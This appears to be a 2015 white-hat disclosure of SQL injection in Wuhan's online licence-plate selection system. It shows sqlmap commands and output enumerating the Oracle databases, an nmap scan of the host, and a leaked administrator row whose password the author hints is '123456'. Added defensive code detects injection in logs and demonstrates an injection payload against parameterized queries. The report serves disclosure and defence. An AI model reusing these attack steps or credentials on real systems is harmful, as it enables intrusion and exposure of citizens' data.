2015-09-28: Details have been sent to the vendor and are awaiting the vendor's handling
2015-09-30: Vendor has confirmed; details are disclosed to the vendor only
2015-10-10: Details disclosed to core white hats and experts in the relevant field
2015-10-20: Details disclosed to ordinary white hats
2015-10-30: Details disclosed to intern white hats
2015-11-14: Details disclosed to the public
As per the title.
The Wuhan Traffic Management Bureau's online self-service licence plate number selection system has SQL injection, exposing a large amount of personal data. It looks like you could directly choose your own plate number, since that is what the system is for, but I did not test that specifically, even though nobody has come to check my water meter. This was a friendly test; all related data has been deleted. Injection link:
http://**.**.**.**:9080/vehweb/getsysparaminfo?action=Hd&glbm=420100&xzqh=420104&hpzl=02
Discovery process: this is the online number-selection system; just capture the request.
http://**.**.**.**:9080/vehweb/navigator
A whole pile of databases, and permissions have not been configured, so you can query across databases.
python sqlmap.py -u http://**.**.**.**:9080/vehweb/getsysparaminfo\?action\=Hd\&glbm\=420100\&xzqh\=420104\&hpzl\=02 --current-use
[12:32:26] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[12:32:26] [INFO] fetching current user
[12:32:26] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[12:32:26] [INFO] retrieved: VEH_ZBZX
current user: 'VEH_ZBZX'
python sqlmap.py -u http://**.**.**.**:9080/vehweb/getsysparaminfo\?action\=Hd\&glbm\=420100\&xzqh\=420104\&hpzl\=02 --dbs
available databases [30]:
[*] CTXSYS
[*] DRV_HEALTH
[*] HR
[*] MDSYS
[*] NET
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TEST1
[*] VEH_ZBZX
[*] VEHI
[*] WHJG
[*] WKSYS
[*] WMSYS
[*] XDB
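From the defender's side, the request above is exactly what an injection scanner hammers, and the two tell-tales are a scanner user-agent and SQL fragments inside the numeric-looking parameters. The following is an added example, not part of the original report: a small detector run over constructed Tomcat-style access log lines for the /vehweb/getsysparaminfo endpoint (the log format, IPs, user-agent strings and the burst threshold are assumptions).

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Combined/Tomcat access-log format: ip ident user [time] "METHOD target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Generic injection fragments: a quote followed by boolean logic, UNION SELECT,
# SQL comments, and the Oracle sleep primitive scanners use for time-based tests.
SQLI_RE = re.compile(
    r"(['\"]\s*(?:or|and)\b|union\s+select|--\s|/\*|dbms_pipe\.receive_message)",
    re.IGNORECASE)

# Constructed sample log: one normal request, one from a scanner, one hand-crafted
# injection attempt hiding behind a browser user-agent.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Sep/2015:12:32:26 +0800] "GET /vehweb/getsysparaminfo?action=Hd&glbm=420100&xzqh=420104&hpzl=02 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [28/Sep/2015:12:32:26 +0800] "GET /vehweb/getsysparaminfo?action=Hd&glbm=420100&xzqh=420104&hpzl=02%27%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '10.0.0.7 - - [28/Sep/2015:12:33:01 +0800] "GET /vehweb/getsysparaminfo?action=Hd&glbm=420100%27%20OR%20%271%27%3D%271&xzqh=420104&hpzl=02 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one access-log line into fields and decode the query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes values, so encoded quotes become visible here
    rec["params"] = dict(parse_qsl(parts.query, keep_blank_values=True))
    return rec


def classify(rec):
    """Return the reasons a single request looks like injection testing."""
    reasons = []
    if "sqlmap" in rec["ua"].lower():
        reasons.append("sqlmap user-agent")
    for name, value in rec["params"].items():
        if SQLI_RE.search(value):
            reasons.append("sqli pattern in %s" % name)
    return reasons


def scan(lines, endpoint="/vehweb/getsysparaminfo", burst=20):
    """Alert on suspicious requests to the endpoint and on per-IP request bursts."""
    alerts = []
    per_ip = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["path"] != endpoint:
            continue
        per_ip[rec["ip"]] += 1
        for why in classify(rec):
            alerts.append((rec["ip"], why))
    # Scanners issue hundreds of requests per parameter; a burst from one
    # source is worth an alert even when every payload was encoded past the regex.
    for ip, count in per_ip.items():
        if count >= burst:
            alerts.append((ip, "burst: %d requests to %s" % (count, endpoint)))
    return alerts


if __name__ == "__main__":
    for ip, why in scan(SAMPLE_LOG):
        print(ip, why)
```

The regexes are deliberately narrow; in production they would sit behind a per-parameter allowlist (these codes are fixed-width digit strings) so that anything non-numeric in glbm, xzqh or hpzl is itself the alert.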
This server is also running quite a few services.
nmap -A **.**.**.**
Starting Nmap 6.47 ( http://**.**.**.** ) at 2015-09-28 15:07 CST
Nmap scan report for **.**.**.** (**.**.**.**)
Host is up (0.0069s latency).
Not shown: 987 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.5 (protocol 2.0)
| ssh-hostkey:
|   1024 1a:4b:46:60:5f:2b:56:17:ca:fd:7d:ed:db:a4:be:fb (DSA)
|_  2048 60:2a:3e:23:72:c9:59:31:12:96:99:4f:ca:97:7e:e7 (RSA)
23/tcp   open  telnet  Busybox telnetd
80/tcp   open  http    Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_See http://**.**.**.**/nsedoc/scripts/http-methods.html
|_http-title: \xE6\xAD\xA6\xE6\xB1\x89\xE5\xB8\x82\xE5\x85\xAC\xE5\xAE\x89\xE5\xB1\x80\xE4\xBA\xA4\xE9\x80\x9A\xE7\xAE\xA1\xE7\x90\x86\xE5\xB1\x80
88/tcp   open  http    Microsoft IIS httpd 7.5
| http-methods: Potentially risky methods: TRACE
|_See http://**.**.**.**/nsedoc/scripts/http-methods.html
|_http-title: \xE6\xAD\xA6\xE6\xB1\x89\xE5\xB8\x82\xE5\x85\xAC\xE5\xAE\x89\xE5\xB1\x80\xE4\xBA\xA4\xE9\x80\x9A\xE7\xAE\xA1\xE7\x90\x86\xE5\xB1\x80
8082/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title.
8083/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title.
8084/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: Site doesn't have a title.
8085/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title.
8087/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title.
8089/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title.
9080/tcp open  glrpc?
9081/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-methods: No Allow or Public header in OPTIONS response (status code 404)
|_http-title: Site doesn't have a title.
Personal information in the clear, and this is only the tip of the iceberg.
ID,PWD,ORG,NAME,TYPE,STATE,REALNAME,THISLOGIN,LASTLOGIN,CREATETIME
1,E10ADC3949BA59ABBE56E057F20F883E,武汉交管局,sa,1,1,系统管理员,02-11月-09 **.**.**.**000 下午,12-10月-09 **.**.**.**000 上午,15-9月 -09 **.**.**.**000 上午
I am not going to tell you that the sa password is "123456".
There are all kinds of other databases too; they are too big, so I won't list them one by one.
Filter the input, but that only treats the symptom, not the root cause. With this many systems, don't put them all in one database; you're not short of money. If you are, then at least configure the permissions; otherwise, with this many systems, a few of them are bound to have holes.
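The remediation note above lists input filtering as the surface fix and privilege separation as the real one. The missing middle piece is the query itself: the page's endpoint takes three numeric codes and, from the sqlmap output, hands them to an Oracle back end. Below is an added example, not code from the report or from the plate-selection system, that reproduces the two code paths side by side on an in-memory SQLite table (the table name, the descr column, the row contents and the code-shape rules are assumptions; the column names follow the request parameters on the page).

```python
import re
import sqlite3

# Constructed stand-in for the number-selection system's parameter table.
# Column names follow the request parameters (glbm, xzqh, hpzl); everything
# else here is an assumption.
ROWS = [
    ("420100", "420104", "02", "small car, district 420104"),
    ("420100", "420106", "02", "small car, district 420106"),
    ("420100", "420104", "01", "large car, district 420104"),
]


def connect():
    """In-memory SQLite database loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sysparam (glbm TEXT, xzqh TEXT, hpzl TEXT, descr TEXT)")
    conn.executemany("INSERT INTO sysparam VALUES (?, ?, ?, ?)", ROWS)
    return conn


def lookup_concat(conn, glbm, xzqh, hpzl):
    """Vulnerable pattern: request values pasted straight into the SQL text,
    so a quote in any parameter rewrites the WHERE clause."""
    sql = ("SELECT descr FROM sysparam WHERE glbm = '%s' AND xzqh = '%s' AND hpzl = '%s'"
           % (glbm, xzqh, hpzl))
    return [row[0] for row in conn.execute(sql)]


def lookup_bound(conn, glbm, xzqh, hpzl):
    """Hardened pattern: bind variables. The values never reach the SQL parser,
    so a quote is just data and matches nothing."""
    sql = "SELECT descr FROM sysparam WHERE glbm = ? AND xzqh = ? AND hpzl = ?"
    return [row[0] for row in conn.execute(sql, (glbm, xzqh, hpzl))]


# Input filtering, the symptom-level fix the report mentions: the codes are
# fixed-width digit strings, so anything else is rejected before the DB sees it.
CODE_SHAPE = {"glbm": r"\d{6}", "xzqh": r"\d{6}", "hpzl": r"\d{2}"}


def validate(params):
    """True only if every code has its expected shape (assumed widths)."""
    return all(re.fullmatch(CODE_SHAPE[k], params.get(k, "")) for k in CODE_SHAPE)


def demo():
    """Run the same quote-bearing value through both code paths and the filter."""
    conn = connect()
    injected = "02' OR '1'='1"
    return {
        "normal_concat": lookup_concat(conn, "420100", "420104", "02"),
        "normal_bound": lookup_bound(conn, "420100", "420104", "02"),
        "injected_concat": lookup_concat(conn, "420100", "420104", injected),
        "injected_bound": lookup_bound(conn, "420100", "420104", injected),
        "filter_blocks_injected": not validate(
            {"glbm": "420100", "xzqh": "420104", "hpzl": injected}),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

With concatenation the quoted value turns the WHERE clause into "... OR '1'='1'" and every row comes back; with binding the same string is compared as a literal and returns nothing. On the JSP/Oracle stack the page describes the equivalent is a JDBC PreparedStatement with ? placeholders (or :name binds in PL/SQL). Binding closes the injection; the report's permissions point still stands, because the VEH_ZBZX account should not be able to read the other 29 schemas even through a future bug.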
Severity: Medium
Vulnerability Rank: 7
Confirmed: 2015-09-30 11:42
Thanks for the submission! We have notified them to fix it.
None yet